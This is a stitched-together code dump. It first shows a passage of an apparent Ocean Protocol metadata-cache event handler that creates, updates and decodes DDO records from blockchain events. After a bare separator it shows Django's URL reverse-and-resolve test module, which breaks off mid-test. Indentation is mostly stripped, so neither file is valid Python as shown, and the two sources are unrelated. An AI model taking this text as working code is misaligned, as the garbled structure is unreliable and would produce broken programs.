logger.warning(msg)
return
_record = init_new_ddo(data, timestamp)
        # this will be used when updating the ddo
_record["event"] = dict()
_record["event"]["txid"] = txid
_record["event"]["blockNo"] = block
_record["event"]["from"] = sender_address
_record["event"]["contract"] = contract_address
_record["price"] = {
"datatoken": 0.0,
"ocean": 0.0,
"value": 0.0,
"type": "",
"address": "",
"pools": [],
"isConsumable": "",
}
dt_address = _record.get("dataToken")
assert dt_address == add_0x_prefix(did[len("did:op:") :])
if dt_address:
_record["dataTokenInfo"] = get_datatoken_info(dt_address)
if not is_valid_dict_remote(
get_metadata_from_services(_record["service"])["attributes"]
):
errors = list_errors(
list_errors_dict_remote,
get_metadata_from_services(_record["service"])["attributes"],
)
logger.error(f"New ddo has validation errors: {errors}")
return False
_record["isInPurgatory"] = "false"
try:
record_str = json.dumps(_record)
self._oceandb.write(record_str, did)
_record = json.loads(record_str)
name = _record["service"][0]["attributes"]["main"]["name"]
debug_log(f"DDO saved: did={did}, name={name}, publisher={sender_address}")
logger.info(
f"Done processing {EVENT_METADATA_CREATED} event: did={did}. DDO SAVED TO DB"
)
return True
except (KeyError, Exception) as err:
logger.error(
f"encountered an error while saving the asset data to OceanDB: {str(err)}"
)
return False
def processUpdateDDO(self, event):
(
did,
block,
txid,
contract_address,
sender_address,
flags,
rawddo,
timestamp,
) = self.get_event_data(event)
debug_log(f"Process update DDO, did from event log:{did}")
try:
asset = self._oceandb.read(did)
except Exception:
# TODO: check if this asset was deleted/hidden due to some violation issues
# if so, don't add it again
logger.warning(f"{did} is not registered, will add it as a new DDO.")
self.processNewDDO(event)
return
debug_log(
f"block {block}, contract: {contract_address}, Sender: {sender_address} , txid: {txid}"
)
# do not update if we have the same txid
ddo_txid = asset["event"]["txid"]
if txid == ddo_txid:
logger.warning(
f'asset has the same txid, no need to update: event-txid={txid} <> asset-event-txid={asset["event"]["txid"]}'
)
return
# check block
ddo_block = asset["event"]["blockNo"]
if int(block) <= int(ddo_block):
logger.warning(
f"asset was updated later (block: {ddo_block}) vs transaction block: {block}"
)
return
# check owner
if not compare_eth_addresses(
asset["publicKey"][0]["owner"], sender_address, logger
):
logger.warning("Transaction sender must mach ddo owner")
return
debug_log(f"decoding with did {did} and flags {flags}")
data = self.decode_ddo(rawddo, flags)
if data is None:
logger.warning("Cound not decode ddo")
return
msg, _ = validate_data(data, "event update")
if msg:
logger.error(msg)
return
_record = init_new_ddo(data, timestamp)
# make sure that we do not alter created flag
_record["created"] = asset["created"]
# but we update 'updated'
_record["updated"] = format_timestamp(
datetime.fromtimestamp(timestamp).strftime(DATETIME_FORMAT)
)
_record["event"] = dict()
_record["event"]["txid"] = txid
_record["event"]["blockNo"] = block
_record["event"]["from"] = sender_address
_record["event"]["contract"] = contract_address
if not is_valid_dict_remote(
get_metadata_from_services(_record["service"])["attributes"]
):
errors = list_errors(
list_errors_dict_remote,
get_metadata_from_services(_record["service"])["attributes"],
)
logger.error(f"ddo update has validation errors: {errors}")
return
_record["price"] = asset.get("price", {})
dt_address = _record.get("dataToken")
assert dt_address == add_0x_prefix(did[len("did:op:") :])
if dt_address:
_record["dataTokenInfo"] = get_datatoken_info(dt_address)
_record["isInPurgatory"] = asset.get("isInPurgatory", "false")
try:
self._oceandb.update(json.dumps(_record), did)
logger.info(f"updated DDO saved to db successfully (did={did}).")
return True
except (KeyError, Exception) as err:
logger.error(
f"encountered an error while updating the asset data to OceanDB: {str(err)}"
)
return
def get_event_data(self, event):
tx_id = event.transactionHash.hex()
sender = event.args.get("createdBy", event.args.get("updatedBy"))
blockInfo = self._web3.eth.getBlock(event.blockNumber)
timestamp = blockInfo["timestamp"]
return (
f"did:op:{remove_0x_prefix(event.args.dataToken)}",
event.blockNumber,
tx_id,
event.address,
sender,
event.args.get("flags", None),
event.args.get("data", None),
timestamp,
)
def decode_ddo(self, rawddo, flags):
debug_log(f"flags: {flags}")
# debug_log(f'Before unpack rawddo:{rawddo}')
if len(flags) < 1:
debug_log("Set check_flags to 0!")
check_flags = 0
else:
check_flags = flags[0]
# always start with MSB -> LSB
debug_log(f"checkflags: {check_flags}")
# bit 2: check if ddo is ecies encrypted
if check_flags & 2:
try:
rawddo = self.ecies_decrypt(rawddo)
logger.debug(f"Decrypted to {rawddo}")
except (KeyError, Exception) as err:
logger.error(f"Failed to decrypt: {str(err)}")
# bit 1: check if ddo is lzma compressed
if check_flags & 1:
try:
rawddo = Lzma.decompress(rawddo)
logger.debug(f"Decompressed to {rawddo}")
except (KeyError, Exception) as err:
logger.error(f"Failed to decompress: {str(err)}")
logger.debug(f"After unpack rawddo:{rawddo}")
try:
ddo = json.loads(rawddo)
return ddo
except (KeyError, Exception) as err:
logger.error(f"encountered an error while decoding the ddo: {str(err)}")
return None
def ecies_decrypt(self, rawddo):
if self._ecies_account is not None:
key = eth_keys.KeyAPI.PrivateKey(self._ecies_account.privateKey)
rawddo = ecies.decrypt(key.to_hex(), rawddo)
return rawddo
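# Illustrative sketch: decode_ddo() above undoes what a publisher does when
# submitting metadata. The first byte of `flags` uses bit 0 to mark lzma
# compression and bit 1 to mark ECIES encryption, and decoding decrypts before
# decompressing. A minimal, hypothetical publisher-side packing that uses
# compression only (_example_pack_ddo is not part of this module):
def _example_pack_ddo(ddo_dict):
    rawddo = Lzma.compress(json.dumps(ddo_dict).encode("utf-8"))
    flags = bytes([1])  # bit 0 set: lzma-compressed, not ECIES-encrypted
    return flags, rawddo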
|
tests.py
|
"""
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import (
RequestFactory, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, include, path, re_path, resolve,
reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
(
'/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-view-class',
views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
(
'/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
(
'/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
'/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
(), {'arg1': '42', 'arg2': '37'}
),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
(
'/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('42', '37'), {}
),
(
'/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('12', '42', '37'), {}
),
# Namespaces
(
'/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'inc-ns1', 'inc-ns1:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Nested namespaces
(
'/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-ns1:inc-ns4:inc-ns2:test-ns3',
'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-app:inc-ns4:inc-ns2:test-ns3',
'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Namespaces capturing variables
(
'/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
views.empty_view, (), {'outer': '70'}
),
(
'/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
),
)
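# Each row above describes what resolve() should report for a given path; the
# first row, for example, corresponds roughly to the following (shown only as
# an illustration, the actual assertions live in the test classes of this
# module):
#
#   match = resolve('/normal/42/37/')
#   match.url_name  # 'normal-view'
#   match.kwargs    # {'arg1': '42', 'arg2': '37'}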
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('named_optional', '/optional/1/', [1], {}),
('named_optional', '/optional/1/', [], {'arg1': 1}),
('named_optional', '/optional/1/2/', [1, 2], {}),
('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('named_optional_terminated', '/optional/1/', [1], {}),
('named_optional_terminated', '/optional/1/', [], {'arg1': 1}),
('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
(
'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
{'drive_name': 'C', 'path': r'Documents and Settings\spam'}
),
('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('test', '/test/1', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
# Security tests
('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
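# Each row above is a (name, expected, args, kwargs) case for reverse(); for
# example, the 'places' rows correspond roughly to:
#
#   reverse('places', args=[3])    # -> '/places/3/'
#   reverse('places', args=['a'])  # -> raises NoReverseMatch
#
# These rows are exercised by URLPatternReverse.test_urlpattern_reverse below.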
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see the 'urlpatterns' "
"variable with valid patterns in the file then the issue is "
"probably caused by a circular import."
):
getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse('name', args=['a'], kwargs={'b': 'c'})
@override_script_prefix('/{{invalid}}/')
def test_prefix_braces(self):
self.assertEqual(
'/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include')
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix('/bogus)/'):
self.assertEqual(
'/bogus)/includes/non_path_include/',
reverse('non_path_include')
)
with override_script_prefix('/(bogus)/'):
self.assertEqual(
'/(bogus)/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/bump%20map/')
def test_prefix_format_char(self):
self.assertEqual(
'/bump%2520map/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/%7Eme/')
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix('/script:name/')
def test_script_name_escaping(self):
self.assertEqual(
reverse('optional', args=['foo:bar']),
'/script:name/optional/foo:bar/'
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('nonexistent-view')
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places')
def test_illegal_args_message(self):
msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', args=(1, 2))
def test_illegal_kwargs_message(self):
msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<URLPattern list>', repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = 'urlpatterns_reverse.named_urls'
proxy_url = reverse_lazy('named-url1', urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver('urlpatterns_reverse.named_urls')
test_urls = [
# (name, args, kwargs, expected)
('named-url1', (), {}, ''),
('named-url2', ('arg',), {}, 'extra/arg/'),
('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
('name-conflict', (), {}, 'conflict/'),
# With an arg, the last URL in urlpatterns has precedence.
('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
# With a kwarg, other URL patterns can be reversed.
('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
# The number and order of the arguments don't interfere with reversing.
('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ['', 'a', '\\', '.']
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{'type': URLPattern, 'name': 'named-url1'}],
[{'type': URLPattern, 'name': 'named-url2'}],
[{'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLResolver}],
]
with self.assertRaisesMessage(Resolver404, 'tried') as cm:
resolve('/included/nonexistent-url', urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn('tried', e.args[0])
self.assertEqual(
len(e.args[0]['tried']),
len(url_types_names),
'Wrong number of tried URLs returned. Expected %s, got %s.' % (
len(url_types_names), len(e.args[0]['tried'])
)
)
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
                    self.assertIsInstance(t, e['type'], '%s is not an instance of %s' % (t, e['type']))
if 'name' in e:
if not e['name']:
self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(
t.name,
e['name'],
'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name)
)
def test_namespaced_view_detail(self):
resolver = get_resolver('urlpatterns_reverse.nested_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver('urlpatterns_reverse.method_view_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.force_login(alfred)
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
'Some URL: %s' % reverse_lazy('some-login-page'),
'Some URL: /login/'
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get('/')
self.assertEqual(
request.build_absolute_uri(reverse_lazy('some-login-page')),
'http://testserver/login/',
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
'settings.py',
extra="from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')",
)
def test_lazy_in_settings(self):
out, err = self.run_manage(['check'])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
with self.assertRaises(NoReverseMatch):
redirect('not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
# Assert that we can redirect using UTF-8 strings
res = redirect('/æøå/abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5/abc/')
# Assert that no imports are attempted when dealing with a relative path
        # (previously, the below would result in a UnicodeEncodeError from __import__)
res = redirect('/æøå.abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5.abc/')
res = redirect('os.path')
self.assertEqual(res.url, 'os.path')
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), '/includes/nested_path/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('urlobject-view', [], {}),
('urlobject-view', [37, 42], {}),
('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('inner-nothing', [], {}),
('inner-nothing', [37, 42], {}),
('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
'blahblah:urlobject-view',
'test-ns1:blahblah:urlobject-view',
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
('normal-view', [], {}, '/normal/'),
('normal-view', [37, 42], {}, '/normal/37/42/'),
('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
('special-view', [], {}, '/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
